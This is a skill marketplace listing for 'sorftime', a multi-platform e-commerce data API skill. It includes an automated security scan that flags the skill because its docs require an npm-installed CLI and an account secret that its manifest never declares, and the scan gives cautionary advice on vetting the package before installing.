Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
sorftime
v0.1.5Sorftime 多平台电商数据分析API支持,覆盖亚马逊、Shopee、沃尔玛等平台的类目、产品、关键词、监控等功能
⭐ 0· 48·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
Skill name/description claim to provide Sorftime API helpers. However the skill metadata lists no binaries, no env vars, and no primary credential, while the instructions repeatedly require a separate sorftime-cli and an Account-SK (secret). Requiring a networked CLI and an account secret is reasonable for an API integration, but failing to declare that in the skill manifest is inconsistent and surprising.
Instruction Scope
SKILL.md and resource files instruct the user/agent to run: `npm install -g sorftime-cli`, `sorftime add <profile> <your-account-sk>`, and many `sorftime api ...` commands. Those steps cause installation of third‑party code and submission of an Account‑SK to an external service. The instructions do not reference service endpoints or explicitly declare the secret as a required credential in the manifest, which is scope/information mismatch. The docs do not instruct reading unrelated system files, but they do direct installation and use of external tooling that can transmit secrets.
Install Mechanism
The skill is instruction‑only (no install spec). The docs recommend `npm install -g sorftime-cli` (an npm package). Installing an arbitrary npm package is a moderate risk (archive code executed on host), and because the skill metadata gives no install info, the agent/user may be surprised. No URLs or release hosts are declared; package provenance is unknown.
Credentials
Manifest declares no required environment variables or primary credential, yet the runtime instructions require an Account-SK to be added via `sorftime add <profile> <your-account-sk>`. That secret will be handled by the external CLI. The skill should have declared the credential it expects; absence is disproportionate and reduces transparency about what will access your secrets.
Persistence & Privilege
always:false and no special platform-wide privileges are requested. The skill does not attempt to modify other skills or system-wide agent settings in the provided docs. However, the recommended npm CLI installation will persist a global binary on the host — a normal but noteworthy side effect.
What to consider before installing
This skill's docs tell you to install a separate npm package (sorftime-cli) and to supply an Account-SK secret, but the skill metadata does not declare those requirements — treat that as a red flag. Before installing or providing secrets: 1) Verify the sorftime-cli npm package (publisher, downloads, repository, recent updates, and open source code) and prefer installing in a sandbox or container; 2) Do not reuse high‑privilege or long‑lived credentials — create a limited test account or API key you can revoke; 3) Inspect the CLI source (or its GitHub repo) for network endpoints and data handling (does it exfiltrate anything beyond the expected Sorftime API?), and check npm package integrity; 4) If you must proceed, run the CLI in a restricted environment (VM/container) and monitor network traffic; 5) Ask the skill publisher for homepage, source repo, and clarification why the skill manifest omits the credential/install requirements — if they cannot provide credible provenance, avoid installing.Like a lobster shell, security has layers — review code before you run it.
latestvk972p02ke7ncbfkvd7ng4mh8hh84xedm
License
MIT-0
Free to use, modify, and redistribute. No attribution required.